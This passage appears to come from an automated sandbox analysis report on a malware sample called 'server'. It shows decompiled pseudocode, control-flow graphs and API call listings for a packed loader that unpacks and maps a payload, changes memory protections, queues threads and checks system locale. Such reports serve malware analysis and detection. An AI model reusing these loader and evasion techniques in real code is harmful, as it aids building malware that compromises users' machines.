                    0x004012e3

                    APIs
                      • Part of subcall function 004012E6: RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
                    • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401337,?,?,?,?,?,00000002,?,?), ref: 00401226
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00401248
                    • GetProcAddress.KERNEL32(00000000,?), ref: 0040125E
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00401274
                    • GetProcAddress.KERNEL32(00000000,?), ref: 0040128A
                    • GetProcAddress.KERNEL32(00000000,?), ref: 004012A0
                      • Part of subcall function 0040110B: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76684EE0,00000000,00000000,?), ref: 00401168
                      • Part of subcall function 0040110B: memset.NTDLL ref: 0040118A
                    Memory Dump Source
                    • Source File: 00000000.00000002.580373097.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.580373097.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.580373097.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.580373097.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_server.jbxd
                    Similarity
                    • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                    • String ID:
                    • API String ID: 3012371009-0
                    • Opcode ID: ef3fb27e8fef4e2a0636531737cea3558674998f5155fbc55e035b1692bada1c
                    • Instruction ID: f32f865edd81f5c961b11f374a2ae16c892bfa44bfba4a474c1bfb8eea8db87f
                    • Opcode Fuzzy Hash: ef3fb27e8fef4e2a0636531737cea3558674998f5155fbc55e035b1692bada1c
                    • Instruction Fuzzy Hash: 7C210CB4A0060BAFD710DFA9CD4495B77ECEB54314700447AEA09FB261EB74E9008B68
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 100%
                    			_entry_() {
                    				void* _t1;
                    				int _t4;
                    				int _t6;
                    
                    				_t6 = 0;
                    				_t1 = HeapCreate(0, 0x400000, 0); // executed
                    				 *0x404160 = _t1;
                    				if(_t1 != 0) {
                    					 *0x404170 = GetModuleHandleA(0);
                    					GetCommandLineW(); // executed
                    					_t4 = E004019F1(); // executed
                    					_t6 = _t4;
                    					HeapDestroy( *0x404160);
                    				}
                    				ExitProcess(_t6);
                    			}






                    0x00401de2
                    0x00401deb
                    0x00401df1
                    0x00401df8
                    0x00401e01
                    0x00401e06
                    0x00401e0c
                    0x00401e17
                    0x00401e19
                    0x00401e19
                    0x00401e20

                    APIs
                    • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 00401DEB
                    • GetModuleHandleA.KERNEL32(00000000), ref: 00401DFB
                    • GetCommandLineW.KERNEL32 ref: 00401E06
                      • Part of subcall function 004019F1: NtQuerySystemInformation.NTDLL ref: 00401A26
                      • Part of subcall function 004019F1: Sleep.KERNELBASE(00000000,00000000,00000030,?,00000000), ref: 00401A6D
                      • Part of subcall function 004019F1: GetLocaleInfoA.KERNELBASE(00000400,0000005A,?,00000004,?,00000000), ref: 00401A95
                      • Part of subcall function 004019F1: GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401A9F
                      • Part of subcall function 004019F1: VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401AB2
                      • Part of subcall function 004019F1: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401ADF
                      • Part of subcall function 004019F1: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401AFD
                    • HeapDestroy.KERNEL32 ref: 00401E19
                    • ExitProcess.KERNEL32 ref: 00401E20
                    Memory Dump Source
                    • Source File: 00000000.00000002.580373097.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.580373097.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.580373097.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.580373097.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_server.jbxd
                    Similarity
                    • API ID: Name$HeapLanguageLongPathSystem$CommandCreateDefaultDestroyExitHandleInfoInformationLineLocaleModuleProcessQuerySleep
                    • String ID:
                    • API String ID: 1863574965-0
                    • Opcode ID: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
                    • Instruction ID: 5d9c3f05f0f46dd7afa9dd855db83e90556071015df760abc973ca805bcb04d9
                    • Opcode Fuzzy Hash: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
                    • Instruction Fuzzy Hash: 0BE0B6B1403220ABC7116F71BE0CA4F7E28BB89B527000539FA05F2279CB384A41CADC
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 168 540005-540038 call 54092b call 54003c 173 540057-540263 call 540e0f call 540d90 VirtualAlloc 168->173 174 54003a-540048 168->174 187 540265-540289 call 540a69 173->187 188 54028b-540292 173->188 174->173 192 5402ce-5403c2 VirtualProtect call 540cce call 540ce7 187->192 190 5402a1-5402b0 188->190 191 5402b2-5402cc 190->191 190->192 191->192 194 540294-54029b 191->194 199 5403d1-5403e0 192->199 194->190 200 5403e2-540437 call 540ce7 199->200 201 540439-5404b8 VirtualFree 199->201 200->199 203 5405f4-5405fe 201->203 204 5404be-5404cd 201->204 205 540604-54060d 203->205 206 54077f-540789 203->206 208 5404d3-5404dd 204->208 205->206 211 540613-540637 205->211 209 5407a6-5407b0 206->209 210 54078b-5407a3 206->210 208->203 213 5404e3-540505 208->213 214 5407b6-5407cb 209->214 215 54086e-5408f9 LoadLibraryA 209->215 210->209 216 54063e-540648 211->216 221 540517-540520 213->221 222 540507-540515 213->222 218 5407d2-5407d5 214->218 226 540902-54091d 215->226 227 5408fb-540901 215->227 216->206 219 54064e-54065a 216->219 223 540824-540833 218->223 224 5407d7-5407e0 218->224 219->206 225 540660-54066a 219->225 228 540526-540547 221->228 222->228 232 540839-54083c 223->232 229 5407e4-540822 224->229 230 5407e2 224->230 231 54067a-540689 225->231 227->226 233 54054d-540550 228->233 229->218 230->223 234 540750-54077a 231->234 235 54068f-5406b2 231->235 232->215 236 54083e-540847 232->236 238 540556-54056b 233->238 239 5405e0-5405ef 233->239 234->216 240 5406b4-5406ed 235->240 241 5406ef-5406fc 235->241 242 540849 236->242 243 54084b-54086c 236->243 244 54056d 238->244 245 54056f-54057a 238->245 239->208 240->241 246 5406fe-540748 241->246 247 54074b 241->247 242->215 243->232 244->239 248 54057c-540599 245->248 249 54059b-5405bb 245->249 246->247 247->231 254 5405bd-5405db 248->254 249->254 254->233
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0054024D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.580453253.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_540000_server.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: cess$kernel32.dll
                    • API String ID: 4275171209-1230238691
                    • Opcode ID: 6bdfaac6897b95ce373e99708c469e13dbd82992d17ba98ec564c2ec7f351265
                    • Instruction ID: b3d7a32aeb9f4883534c5e4c992b648fa1dc61d68ef5eecc71f663662e3bc53c
                    • Opcode Fuzzy Hash: 6bdfaac6897b95ce373e99708c469e13dbd82992d17ba98ec564c2ec7f351265
                    • Instruction Fuzzy Hash: 6FC19BB5D01228EFDF60CFA8D985BDDBBB5BF08304F208099E548A7252DB319A94DF11
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 265 4014cf-401512 VirtualProtect 266 4015a6-4015ad 265->266 267 401518-40151c 265->267 267->266 268 401522-40152c 267->268 269 40154a-401554 268->269 270 40152e-401538 268->270 271 401556-401566 269->271 272 401568 269->272 273 401542-401548 270->273 274 40153a-401540 270->274 271->272 275 40156e-401581 VirtualProtect 271->275 272->275 273->275 274->275 276 401583-401589 GetLastError 275->276 277 40158c-4015a0 275->277 276->277 277->266 277->267
                    C-Code - Quality: 87%
                    			E004014CF(void* __eax, void* _a4) {
                    				signed int _v8;
                    				signed int _v12;
                    				signed int _v16;
                    				long _v20;
                    				int _t42;
                    				long _t53;
                    				intOrPtr _t56;
                    				void* _t57;
                    				signed int _t59;
                    
                    				_v12 = _v12 & 0x00000000;
                    				_t56 =  *0x404180;
                    				_t57 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                    				_v16 =  *(__eax + 6) & 0x0000ffff;
                    				VirtualProtect(_a4,  *(__eax + 0x54), _t56 - 0x43175abf,  &_v20); // executed
                    				_v8 = _v8 & 0x00000000;
                    				if(_v16 <= 0) {
                    					L12:
                    					return _v12;
                    				} else {
                    					goto L1;
                    				}
                    				while(1) {
                    					L1:
                    					_t59 = _v12;
                    					if(_t59 != 0) {
                    						goto L12;
                    					}
                    					asm("bt [esi+0x24], eax");
                    					if(_t59 >= 0) {
                    						asm("bt [esi+0x24], eax");
                    						if(__eflags >= 0) {
                    							L8:
                    							_t53 = _t56 - 0x43175abf;
                    							L9:
                    							_t42 = VirtualProtect( *((intOrPtr*)(_t57 + 0xc)) + _a4,  *(_t57 + 8), _t53,  &_v20); // executed
                    							if(_t42 == 0) {
                    								_v12 = GetLastError();
                    							}
                    							_t57 = _t57 + (_t56 - 0x3175ac2) * 0x28;
                    							_v8 = _v8 + 1;
                    							if(_v8 < _v16) {
                    								continue;
                    							} else {
                    								goto L12;
                    							}
                    						}
                    						asm("bt [esi+0x24], eax");
                    						_t53 = _t56 - 0x43175ac1;
                    						if(__eflags >= 0) {
                    							goto L9;
                    						}
                    						goto L8;
                    					}
                    					asm("bt [esi+0x24], eax");
                    					if(_t59 >= 0) {
                    						_t53 = _t56 - 0x43175aa3;
                    					} else {
                    						_t53 = _t56 - 0x43175a83;
                    					}
                    					goto L9;
                    				}
                    				goto L12;
                    			}












                    0x004014d9
                    0x004014e6
                    0x004014ec
                    0x004014f8
                    0x00401508
                    0x0040150a
                    0x00401512
                    0x004015a6
                    0x004015ad
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00401518
                    0x00401518
                    0x00401518
                    0x0040151c
                    0x00000000
                    0x00000000
                    0x00401528
                    0x0040152c
                    0x00401550
                    0x00401554
                    0x00401568
                    0x00401568
                    0x0040156e
                    0x0040157d
                    0x00401581
                    0x00401589
                    0x00401589
                    0x00401595
                    0x00401597
                    0x004015a0
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004015a0
                    0x0040155c
                    0x00401560
                    0x00401566
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00401566
                    0x00401534
                    0x00401538
                    0x00401542
                    0x0040153a
                    0x0040153a
                    0x0040153a
                    0x00000000
                    0x00401538
                    0x00000000

                    APIs
                    • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 00401508
                    • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 0040157D
                    • GetLastError.KERNEL32 ref: 00401583
                    Memory Dump Source
                    • Source File: 00000000.00000002.580373097.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.580373097.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.580373097.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.580373097.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_server.jbxd
                    Similarity
                    • API ID: ProtectVirtual$ErrorLast
                    • String ID:
                    • API String ID: 1469625949-0
                    • Opcode ID: fa1f72f039ba5afec073a1f2adf273f2725f5d9d4501c0cfce72b6ba3d5ab017
                    • Instruction ID: db8870d9979c58085381c8b0541bfb0d1fdb36fbc34c572f0fe0e58abbf4653c
                    • Opcode Fuzzy Hash: fa1f72f039ba5afec073a1f2adf273f2725f5d9d4501c0cfce72b6ba3d5ab017
                    • Instruction Fuzzy Hash: D1212B7280121AEFCB14CF95C9819AAF7B4FF58305F04487AE413AB960E738AA55CF58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 306 40139f-4013b6 307 4013c0 306->307 308 4013b8-4013be 306->308 309 4013c6-4013f3 call 401d3c call 401882 307->309 308->309 314 4013f5-40141a lstrlenW call 4015b0 309->314 315 40144e-401450 309->315 319 401443-401447 call 4012fb 314->319 320 40141c-40142e 314->320 317 401451-401452 ExitThread 315->317 325 40144c 319->325 321 401430-40143b call 401fe6 320->321 322 40143d-40143f 320->322 321->319 322->319 325->317
                    C-Code - Quality: 100%
                    			E0040139F() {
                    				char _v16;
                    				intOrPtr _v28;
                    				void _v32;
                    				void* _v36;
                    				intOrPtr _t15;
                    				void* _t16;
                    				void* _t24;
                    				long _t25;
                    				int _t26;
                    				void* _t30;
                    				intOrPtr* _t32;
                    				signed int _t35;
                    				intOrPtr _t38;
                    
                    				_t15 =  *0x404184;
                    				if( *0x40416c > 5) {
                    					_t16 = _t15 + 0x40513c;
                    				} else {
                    					_t16 = _t15 + 0x40529c;
                    				}
                    				E00401D3C(_t16, _t16);
                    				_t35 = 6;
                    				memset( &_v32, 0, _t35 << 2);
                    				_t24 = E00401882( &_v32,  &_v16,  *0x404180 ^ 0xdd0210cf); // executed
                    				if(_t24 == 0) {
                    					_t25 = 0xb;
                    				} else {
                    					_t26 = lstrlenW( *0x404178);
                    					_t8 = _t26 + 2; // 0x2
                    					_t11 = _t26 + _t8 + 8; // 0xa
                    					_t30 = E004015B0(_t38, _t11,  &_v32,  &_v36); // executed
                    					if(_t30 == 0) {
                    						_t32 = _v36;
                    						 *_t32 = 0;
                    						if( *0x404178 == 0) {
                    							 *((short*)(_t32 + 4)) = 0;
                    						} else {
                    							L00401FE6(_t32 + 4);
                    						}
                    					}
                    					_t25 = E004012FB(_v28); // executed
                    				}
                    				ExitThread(_t25);
                    			}
















                    0x004013a5
                    0x004013b6
                    0x004013c0
                    0x004013b8
                    0x004013b8
                    0x004013b8
                    0x004013c7
                    0x004013d0
                    0x004013d5
                    0x004013ec
                    0x004013f3
                    0x00401450
                    0x004013f5
                    0x004013fb
                    0x00401401
                    0x0040140f
                    0x00401413
                    0x0040141a
                    0x00401422
                    0x00401426
                    0x0040142e
                    0x0040143f
                    0x00401430
                    0x00401436
                    0x00401436
                    0x0040142e
                    0x00401447
                    0x00401447
                    0x00401452

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.580373097.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.580373097.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.580373097.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.580373097.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_server.jbxd
                    Similarity
                    • API ID: ExitThreadlstrlen
                    • String ID:
                    • API String ID: 2636182767-0
                    • Opcode ID: ac67e65bd4c915eb781d54c6f39458c359880d29bbf57a3e932865a973960b97
                    • Instruction ID: 2b8b17c81bcefa181eed95ac27ced154ec6146dfe98fb58ff2424010aaaeeb75
                    • Opcode Fuzzy Hash: ac67e65bd4c915eb781d54c6f39458c359880d29bbf57a3e932865a973960b97
                    • Instruction Fuzzy Hash: A511E271504205ABE700EB61DD48E5B77ECAF84314F00493BB941F72B1EB38EA448B5A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 327 540e0f-540e24 SetErrorMode * 2 328 540e26 327->328 329 540e2b-540e2c 327->329 328->329
                    APIs
                    • SetErrorMode.KERNELBASE(00000400,?,?,00540223,?,?), ref: 00540E19
                    • SetErrorMode.KERNELBASE(00000000,?,?,00540223,?,?), ref: 00540E1E
                    Memory Dump Source
                    • Source File: 00000000.00000002.580453253.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_540000_server.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorMode
                    • String ID:
                    • API String ID: 2340568224-0
                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                    • Instruction ID: 8c4bb27ebef91340a8cc9f03cc0e2f213876f804ecf9a794f7e7c0ac875d06d5
                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                    • Instruction Fuzzy Hash: 5FD0123114512877D7002A94DC09BCD7F1CDF05B66F108411FB0DD9080C770995046E5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 37%
                    			E00401D3C(void* __eax, intOrPtr _a4) {
                    
                    				 *0x404190 =  *0x404190 & 0x00000000;
                    				_push(0);
                    				_push(0x40418c);
                    				_push(1);
                    				_push(_a4);
                    				 *0x404188 = 0xc; // executed
                    				L00401682(); // executed
                    				return __eax;
                    			}



                    0x00401d3c
                    0x00401d43
                    0x00401d45
                    0x00401d4a
                    0x00401d4c
                    0x00401d50
                    0x00401d5a
                    0x00401d5f

                    APIs
                    • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(004013CC,00000001,0040418C,00000000), ref: 00401D5A
                    Memory Dump Source
                    • Source File: 00000000.00000002.580373097.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.580373097.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.580373097.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.580373097.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_server.jbxd
                    Similarity
                    • API ID: DescriptorSecurity$ConvertString
                    • String ID:
                    • API String ID: 3907675253-0
                    • Opcode ID: d44a2a0f54f5e6775fd6c1e8a7c4d446c5909fbbc7626a237563b1b511256517
                    • Instruction ID: 8b1a9882f0f7b6f5a619b3d6300b2bdd32795284b236dc0e31706888a106ff8d
                    • Opcode Fuzzy Hash: d44a2a0f54f5e6775fd6c1e8a7c4d446c5909fbbc7626a237563b1b511256517
                    • Instruction Fuzzy Hash: AFC04CF4140300B7E620AB409D5AF057A5577A4715F61062DFB04391E1C3F91094952D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 335 4012e6-4012f8 RtlAllocateHeap
                    C-Code - Quality: 100%
                    			E004012E6(long _a4) {
                    				void* _t2;
                    
                    				_t2 = RtlAllocateHeap( *0x404160, 0, _a4); // executed
                    				return _t2;
                    			}




                    0x004012f2
                    0x004012f8

                    APIs
                    • RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
                    Memory Dump Source
                    • Source File: 00000000.00000002.580373097.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.580373097.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.580373097.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.580373097.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_server.jbxd
                    Similarity
                    • API ID: AllocateHeap
                    • String ID:
                    • API String ID: 1279760036-0
                    • Opcode ID: 8d53e43e4fecd4b65d19afa8ec6fbbeba3cde750ccf00ed1d63409ce6b8d1d85
                    • Instruction ID: e72f98105ba7c706faca8ef9926cddb4ff6cd2f9e0c1ce1923eff6ceed1ee1be
                    • Opcode Fuzzy Hash: 8d53e43e4fecd4b65d19afa8ec6fbbeba3cde750ccf00ed1d63409ce6b8d1d85
                    • Instruction Fuzzy Hash: 92B012B1100100ABCA118F11EF08F06BE31B7E4701F004030B3042407482314C20FB1D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 336 401ba9-401bbb RtlFreeHeap
                    C-Code - Quality: 100%
                    			E00401BA9(void* _a4) {
                    				char _t2;
                    
                    				_t2 = RtlFreeHeap( *0x404160, 0, _a4); // executed
                    				return _t2;
                    			}




                    0x00401bb5
                    0x00401bbb

                    APIs
                    • RtlFreeHeap.NTDLL(00000000,00000030,004017ED,00000000,00000030,00000000,00000000,00000030,?,?,?,?,?,00401A66), ref: 00401BB5
                    Memory Dump Source
                    • Source File: 00000000.00000002.580373097.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.580373097.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.580373097.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.580373097.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_server.jbxd
                    Similarity
                    • API ID: FreeHeap
                    • String ID:
                    • API String ID: 3298025750-0
                    • Opcode ID: 3b8eee9051a441d58e5db666830f183a15b7cffca9eb150e625e3af0535b1606
                    • Instruction ID: ce698fd0423bda5088509b7a42681047dd9c8e559710f82c1ef419a06116bbed
                    • Opcode Fuzzy Hash: 3b8eee9051a441d58e5db666830f183a15b7cffca9eb150e625e3af0535b1606
                    • Instruction Fuzzy Hash: 8AB01271000100BBCA118F10EF08F067F21B7E4701F008030B3046407482314D60FB0C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 86%
                    			E004012FB(void* __eax) {
                    				char _v8;
                    				void* _v12;
                    				void* __edi;
                    				void* _t18;
                    				long _t24;
                    				long _t26;
                    				long _t29;
                    				intOrPtr _t40;
                    				void* _t41;
                    				void* _t42;
                    				void* _t44;
                    
                    				_t41 = __eax;
                    				_t16 =  *0x404180;
                    				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4);
                    				_t18 = E00401202( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4), _t16 + 0xbce8a57d,  &_v8,  &_v12); // executed
                    				if(_t18 != 0) {
                    					_t29 = 8;
                    					goto L8;
                    				} else {
                    					_t40 = _v8;
                    					_t29 = E00401BC4(_t33, _t40, _t41);
                    					if(_t29 == 0) {
                    						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
                    						_t24 = E00401000(_t40, _t44); // executed
                    						_t29 = _t24;
                    						if(_t29 == 0) {
                    							_t26 = E004014CF(_t44, _t40); // executed
                    							_t29 = _t26;
                    							if(_t29 == 0) {
                    								_push(_t26);
                    								_push(1);
                    								_push(_t40);
                    								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
                    									_t29 = GetLastError();
                    								}
                    							}
                    						}
                    					}
                    					_t42 = _v12;
                    					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
                    					E00401BA9(_t42);
                    					L8:
                    					return _t29;
                    				}
                    			}














                    0x00401303
                    0x00401305
                    0x00401321
                    0x00401332
                    0x00401339
                    0x00401397
                    0x00000000
                    0x0040133b
                    0x0040133b
                    0x00401345
                    0x00401349
                    0x0040134e
                    0x00401351
                    0x00401356
                    0x0040135a
                    0x0040135f
                    0x00401364
                    0x00401368
                    0x0040136d
                    0x0040136e
                    0x00401372
                    0x00401377
                    0x0040137f
                    0x0040137f
                    0x00401377
                    0x00401368
                    0x0040135a
                    0x00401381
                    0x0040138a
                    0x0040138e
                    0x00401398
                    0x0040139e
                    0x0040139e

                    APIs
                      • Part of subcall function 00401202: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401337,?,?,?,?,?,00000002,?,?), ref: 00401226
                      • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 00401248
                      • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 0040125E
                      • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 00401274
                      • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 0040128A
                      • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 004012A0
                      • Part of subcall function 00401000: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 00401038
                      • Part of subcall function 004014CF: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 00401508
                      • Part of subcall function 004014CF: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 0040157D
                      • Part of subcall function 004014CF: GetLastError.KERNEL32 ref: 00401583
                    • GetLastError.KERNEL32(?,?), ref: 00401379
                    Memory Dump Source
                    • Source File: 00000000.00000002.580373097.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.580373097.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.580373097.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.580373097.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_server.jbxd
                    Similarity
                    • API ID: AddressProc$ErrorLastProtectVirtual$HandleLibraryLoadModule
                    • String ID:
                    • API String ID: 3135819546-0
                    • Opcode ID: 336f5482e3aed059344eafb9dfd841dc67045812ccfd429b7a3489f36f6440d7
                    • Instruction ID: 9c7335bcc5d41c3ee7976e84fb0b4f56712358cbe666051dfec51b4dde3629c0
                    • Opcode Fuzzy Hash: 336f5482e3aed059344eafb9dfd841dc67045812ccfd429b7a3489f36f6440d7
                    • Instruction Fuzzy Hash: 8B11E976600301ABD711ABA68C85DAB77BCAF98318704017EFD01B7A91EA74ED068798
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00541FCF: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00541C63), ref: 00541FDE
                      • Part of subcall function 00541FCF: GetVersion.KERNEL32(?,00541C63), ref: 00541FED
                      • Part of subcall function 00541FCF: GetCurrentProcessId.KERNEL32(?,00541C63), ref: 00542009
                      • Part of subcall function 00541FCF: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00541C63), ref: 00542022
                      • Part of subcall function 0054154D: RtlAllocateHeap.NTDLL(00000000,?,00541477), ref: 00541559
                    • NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 00541C8D
                    • Sleep.KERNEL32(00000000,00000030), ref: 00541CD4
                    • GetLocaleInfoA.KERNEL32(00000400,0000005A,?,00000004), ref: 00541CFC
                    • GetSystemDefaultUILanguage.KERNEL32 ref: 00541D06
                    • VerLanguageNameA.KERNEL32(?,?,00000004), ref: 00541D19
                    • CreateThread.KERNEL32(00000000,00000000,00000000,00000000), ref: 00541D8E
                    • QueueUserAPC.KERNEL32(0040139F,00000000,?), ref: 00541DA4
                    • GetLastError.KERNEL32 ref: 00541DB4
                    • TerminateThread.KERNEL32(00000000,00000000), ref: 00541DBE
                    • SetLastError.KERNEL32(00000000), ref: 00541DCA
                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00541DD7
                    • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 00541DE9
                    • GetLastError.KERNEL32 ref: 00541DF4
                    • GetLastError.KERNEL32 ref: 00541E05
                    Memory Dump Source
                    • Source File: 00000000.00000002.580453253.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_540000_server.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$Thread$CreateLanguageProcessSystem$AllocateCodeCurrentDefaultEventExitHeapInfoInformationLocaleNameObjectOpenQueryQueueSingleSleepTerminateUserVersionWait
                    • String ID:
                    • API String ID: 1666582358-0
                    • Opcode ID: 2f7a3bb356b8b54c1b3c7e8ff32702db1cbd6d7b6564eab963341c519062ef97
                    • Instruction ID: c53088000c7f29f6ac30ad47b36a3707e8ddd0a3eb4632b5add1956d74544151
                    • Opcode Fuzzy Hash: 2f7a3bb356b8b54c1b3c7e8ff32702db1cbd6d7b6564eab963341c519062ef97
                    • Instruction Fuzzy Hash: 0751A1B5901A15BBE720EFB59D48AEFBF7CBB84759B104025F911E3154D730CE809BA8
                    Uniqueness

